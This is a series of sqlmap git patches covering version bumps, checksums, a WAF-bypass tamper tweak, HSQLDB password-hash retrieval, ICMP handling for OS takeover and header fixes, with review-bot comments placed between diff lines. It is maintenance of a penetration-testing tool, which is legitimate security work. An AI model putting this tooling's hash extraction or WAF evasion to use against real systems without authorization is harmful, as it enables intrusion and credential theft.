commonColumns: false + keepAlive: false + /option/{taskid}/get: + post: + tags: + - "option" + summary: "Get task option value(s)" + description: "" + operationId: "optionGet" + consumes: + - "application/json" + produces: + - "application/json" + parameters: + - name: "taskid" + in: "path" + description: "ID of an existing task" + required: true + type: "string" + - in: body + name: options + description: "" + schema: + type: array + items: + type: string + example: ["url", "timeout"] + responses: + 200: + description: "Task option value successfully retrieved" + schema: + type: object + properties: + success: + type: boolean + options: + type: array + items: + type: object + properties: + name: + type: string + value: + type: string + example: + - success: true + options: + url: http://www.test.com/index.php?id=1 + timeout: 30 externalDocs: description: "Find out more about sqlmap API (REST-JSON)" url: "https://github.com/sqlmapproject/sqlmap/wiki/Usage#api-rest-json" \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ee88a07c12..611de95fe29 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f6c316b9de14838f5a70072e514c5974 lib/core/settings.py +b7d7300f745050d9a29bcf30a1ddcc5e lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 
@@ -101,7 +101,7 @@ db208ab47de010836c6bf044e2357861 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py f7813cdee00df8f98d6f811475e520a1 lib/techniques/union/test.py 7361338240ecd9d01d1d10ec76bce069 lib/techniques/union/use.py -dfea8e2ca23c5160b2f57732d8d49023 lib/utils/api.py +038ec99105c59acc2b1c6cb90e9e4043 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py f9867bbfcd6d31916ca73e72e95fd881 lib/utils/deps.py From e11febdcbc05033557872fd0a235f99c30d95ecc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:44:13 +0100 Subject: [PATCH 361/428] Fixes #3375 --- lib/core/settings.py | 2 +- plugins/generic/users.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3d58735a129..e19f030d825 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.9" +VERSION = "1.2.11.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index e2cec9763ca..742a8ec5c66 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -285,6 +285,8 @@ def getPasswordHashes(self): query = rootQuery.blind.query % (user, index, user) elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user,) + elif Backend.isDbms(DBMS.HSQLDB): + query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 611de95fe29..98069ec648a 100644 --- a/txt/checksum.md5 
+++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7d7300f745050d9a29bcf30a1ddcc5e lib/core/settings.py +ffa07ffe5349c0a8d8cff5de53e3211d lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -223,7 +223,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py -e762c77ff79e4c138145501f6fbb10cb plugins/generic/users.py +1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From dc5edf1a86186da22a93abfa8b4a2c7cd321bc89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:52:09 +0100 Subject: [PATCH 362/428] Patch regarding #3377 --- lib/core/settings.py | 2 +- tamper/randomcase.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e19f030d825..109bb737e29 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.10" +VERSION = "1.2.11.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 9d2843154e3..988dd3c8446 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -43,7 +43,7 @@ def tamper(payload, **kwargs): for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): word = match.group() - if word.upper() in kb.keywords: + if word.upper() in kb.keywords or ("%s(" % word) in payload: while True: _ = "" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 98069ec648a..d821f594300 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ffa07ffe5349c0a8d8cff5de53e3211d lib/core/settings.py +93eef5a012b79983815748224f41364f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -270,7 +270,7 @@ a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py -078494e1217400b485ef653108d32699 tamper/randomcase.py +6522603955388256aee014334ebea22b tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py From abb911d7412411fe265fcae298524af1b7023649 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 19 Nov 2018 09:53:09 +0100 Subject: [PATCH 363/428] Just for the sake of #3377 --- lib/core/settings.py | 2 +- tamper/randomcase.py | 1 + txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 109bb737e29..f711a06a366 100644 --- a/lib/core/settings.py 
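Review bot: `("%s(" % word) in payload` is an unanchored substring test, so a short word such as `x` is treated as a function name whenever any longer identifier ending in `x` is followed by `(` elsewhere in the payload (e.g. `max(`), and `word` is taken from `retVal` while the test runs against `payload`, which only agree if nothing has rewritten the text between the two. Anchoring the check on the same word boundary the loop already uses, `re.search(r"\b%s\(" % re.escape(word), payload)`, limits the new branch to the intended names. tamper()'s body continues on both sides of the hunk.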
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.11" +VERSION = "1.2.11.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/randomcase.py b/tamper/randomcase.py index 988dd3c8446..3a01b216ef9 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -25,6 +25,7 @@ def tamper(payload, **kwargs): * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 + * SQLite 3 Notes: * Useful to bypass very weak and bespoke web application firewalls diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d821f594300..c830eaaabc9 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -93eef5a012b79983815748224f41364f lib/core/settings.py +a30083ca6c21379bc31b931dca5b3464 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -270,7 +270,7 @@ a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py 89f8753a0ef65d2bb860c8864e9e935a tamper/percentage.py a47aafcbc1de2deb85160e29de46f748 tamper/plus2concat.py 759b86cf3bb1d7871dc6489538253f94 tamper/plus2fnconcat.py -6522603955388256aee014334ebea22b tamper/randomcase.py +b9db4cc9fc4e0a586198340d1268fdaf tamper/randomcase.py 28626e4b8c673228dcfe4f1627a9e08b tamper/randomcomments.py cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py 4e6da2aca962b6110652e5f83dce5cd7 tamper/space2dash.py 
From 3f1bf742fc513f40946621a83a5d818c1b57b046 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 22 Nov 2018 08:07:27 +0100 Subject: [PATCH 364/428] Fixes #3379 --- lib/core/settings.py | 5 ++++- lib/request/connect.py | 3 +++ txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f711a06a366..42e501548b9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.12" +VERSION = "1.2.11.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -174,6 +174,9 @@ # Minimum time response set needed for time-comparison based on standard deviation MIN_TIME_RESPONSES = 30 +# Maximum time response set used during time-comparison based on standard deviation +MAX_TIME_RESPONSES = 200 + # Minimum comparison ratio set needed for searching valid union column number based on standard deviation MIN_UNION_RESPONSES = 5 diff --git a/lib/request/connect.py b/lib/request/connect.py index 1a6c4e580f7..c3526fd3f06 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -99,6 +99,7 @@ class WebSocketException(Exception): from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES +from lib.core.settings import MAX_TIME_RESPONSES from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IS_WIN from lib.core.settings import LARGE_CHUNK_TRIM_MARKER 
@@ -1293,6 +1294,8 @@ def _(value): elif noteResponseTime: kb.responseTimes.setdefault(kb.responseTimeMode, []) kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) + if len(kb.responseTimes) > MAX_TIME_RESPONSES: + kb.responseTimes = kb.responseTimes[-MAX_TIME_RESPONSES:] if not response and removeReflection: page = removeReflectiveValues(page, payload) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c830eaaabc9..7fb23fc1265 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a30083ca6c21379bc31b931dca5b3464 lib/core/settings.py +668bbf57ac4603b3adf6308646c719dc lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -9bfc067165e82afc0b271f777850ad30 lib/request/connect.py +d21e3452240ae3e59dfeb05fabc9ea14 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 037db0f4a08e880ebf604682e018da6fae4d2226 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 23 Nov 2018 15:55:05 +0100 Subject: [PATCH 365/428] Fixes #3381 --- lib/core/settings.py | 2 +- plugins/generic/takeover.py | 16 +++++++++++----- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 42e501548b9..57b2ff4346a 100644 --- a/lib/core/settings.py 
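Review bot: The new bound is applied to the wrong object: `kb.responseTimes` is a dict keyed by `kb.responseTimeMode` (the `setdefault` on the line above establishes that), so `len(kb.responseTimes)` counts modes rather than recorded responses, and the slice `kb.responseTimes[-MAX_TIME_RESPONSES:]` would raise TypeError on a dict if it were ever reached. The trim should target the per-mode list: `if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES:` / `    kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES:]`. As written the list keeps growing and the cap from MAX_TIME_RESPONSES never takes effect. The enclosing function starts and ends outside the hunk.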
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.14" +VERSION = "1.2.11.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index 88a261040fa..cf721cdae29 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -8,6 +8,7 @@ import os from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import isStackingAvailable from lib.core.common import readInput from lib.core.common import runningAsAdmin @@ -20,6 +21,7 @@ from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapNotVulnerableException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUnsupportedDBMSException from lib.takeover.abstraction import Abstraction 
@@ -132,12 +134,16 @@ def osPwn(self): errMsg += "http://code.google.com/p/impacket/downloads/list" raise SqlmapMissingDependence(errMsg) - sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" + filename = "/proc/sys/net/ipv4/icmp_echo_ignore_all" - if os.path.exists(sysIgnoreIcmp): - fp = open(sysIgnoreIcmp, "wb") - fp.write("1") - fp.close() + if os.path.exists(filename): + try: + with open(filename, "wb") as f: + f.write("1") + except IOError, ex: + errMsg = "there has been a file opening/writing error " + errMsg += "for filename '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7fb23fc1265..ed7e4ad4fbe 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -668bbf57ac4603b3adf6308646c719dc lib/core/settings.py +95c2d218452e270a1a84849448d69110 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -222,7 +222,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py +f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py 1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 
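Review bot: The rewritten block still writes `"1"` to `/proc/sys/net/ipv4/icmp_echo_ignore_all` unconditionally and records nothing, so the operator's machine is left with ICMP echo replies disabled after the run and an already-correct value is rewritten needlessly; reading the current value first, writing only when it is not already `1`, and remembering the original so it can be restored on exit would make the side effect visible and reversible. The new `except IOError` wrapping is the right shape for the failure this write is most likely to hit without sufficient privileges. Whether a restore exists elsewhere cannot be seen here, as osPwn() continues outside the hunk.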
From 277a4fa40232657b7946a2e90ff83a1eaba095de Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 26 Nov 2018 23:40:47 +0100 Subject: [PATCH 366/428] Potential patch for #3167 --- lib/controller/handler.py | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index bb05e11024b..2ff64ea2a07 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -125,10 +125,11 @@ def setHandler(): if conf.forceDbms == dbms or handler.checkDbms(): if kb.resolutionDbms: conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]() + conf.dbmsHandler._dbms = kb.resolutionDbms else: conf.dbmsHandler = handler + conf.dbmsHandler._dbms = dbms - conf.dbmsHandler._dbms = dbms break else: conf.dbmsConnector = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 57b2ff4346a..7f1caee5c37 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.15" +VERSION = "1.2.11.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index ed7e4ad4fbe..b1cb919bba8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
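Review bot: Both branches of the `if kb.resolutionDbms:` block now end with their own `conf.dbmsHandler._dbms = ...` assignment, which is exactly the duplication the removed line used to avoid; a single assignment after the if/else, `conf.dbmsHandler._dbms = kb.resolutionDbms or dbms`, keeps the new behaviour (resolution DBMS wins when set) in one place. This is a style point only: the two forms are equivalent because the else branch is taken exactly when `kb.resolutionDbms` is falsy. setHandler() starts and ends outside the hunk.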
@@ -25,7 +25,7 @@ c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py -ba2717a410b21285d781ab42c4a797d0 lib/controller/handler.py +988b548f6578adf9cec17afdeee8291c lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -95c2d218452e270a1a84849448d69110 lib/core/settings.py +342e732d0772891804c7609578176997 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From f1a3c81aecd7680929962e725fa6572683810b54 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 28 Nov 2018 00:29:17 +0100 Subject: [PATCH 367/428] Bug fix for handling of custom headers --- lib/core/option.py | 4 ++-- lib/core/settings.py | 2 +- lib/core/target.py | 6 +++--- lib/request/connect.py | 4 ++-- txt/checksum.md5 | 8 ++++---- 5 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 1f37b48e9b6..288213acfcc 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1071,7 +1071,7 @@ def _setSafeVisit(): key, value = line.split(':', 1) value = value.strip() kb.safeReq.headers[key] = value - if key == HTTP_HEADER.HOST: + if key.upper() == HTTP_HEADER.HOST.upper(): if not value.startswith("http"): scheme = "http" if value.endswith(":443"): 
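Review bot: The case-insensitive comparison is spelled out by hand as `key.upper() == HTTP_HEADER.HOST.upper()` here, and the same pattern is repeated in the option.py hunk at -1303, the three target.py hunks at -346/-355/-364 and the connect.py hunk at -866; a small helper such as `def isSameHeader(a, b): return a.upper() == b.upper()` next to the HTTP_HEADER constants would keep the rule in one place and make the next missed call site obvious. Note that in `_setSafeVisit` the value is still stored under the original-case `key`, so two spellings of the same header remain separate entries in `kb.safeReq.headers` even though they now compare equal here. `_setSafeVisit` continues outside the hunk.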
@@ -1303,7 +1303,7 @@ def _setHTTPUserAgent(): _ = True for header, _ in conf.httpHeaders: - if header == HTTP_HEADER.USER_AGENT: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): _ = False break diff --git a/lib/core/settings.py b/lib/core/settings.py index 7f1caee5c37..af0dd39dace 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.16" +VERSION = "1.2.11.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 2a6926816f3..a89c0c89143 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -346,7 +346,7 @@ def process(match, repl): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - if httpHeader.title() == HTTP_HEADER.USER_AGENT: + if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper(): conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) @@ -355,7 +355,7 @@ def process(match, repl): conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} testableParameters = True - elif httpHeader.title() == HTTP_HEADER.REFERER: + elif httpHeader.upper() == HTTP_HEADER.REFERER.upper(): conf.parameters[PLACE.REFERER] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) 
@@ -364,7 +364,7 @@ def process(match, repl): conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader.title() == HTTP_HEADER.HOST: + elif httpHeader.upper() == HTTP_HEADER.HOST.upper(): conf.parameters[PLACE.HOST] = urldecode(headerValue) condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) diff --git a/lib/request/connect.py b/lib/request/connect.py index c3526fd3f06..056baa71645 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -866,10 +866,10 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent value = agent.replacePayload(value, payload) else: # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded - if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: skip = False - if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE: + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper(): if kb.cookieEncodeChoice is None: msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b1cb919bba8..a24e0c0860a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -42,17 +42,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -d6dace6468ed5d2bbd500b0a244a9650 lib/core/option.py +c6a8223fbc1dad784d4ae6377e737a97 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -342e732d0772891804c7609578176997 lib/core/settings.py +3f8cf314028234cb8c60c66a915da2e2 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -721198b5be72c8015a02acb116532a1f lib/core/target.py +52642badbbca4c31a2fcdd754d67a983 lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py cd0067d1798e45f422ce44b98baf57db lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -d21e3452240ae3e59dfeb05fabc9ea14 lib/request/connect.py +0113525b321d0d35cf973a9cff34850a lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 1d0d5f1675f67a43d1fbdd10984a84f4c1465081 Mon Sep 17 00:00:00 2001 
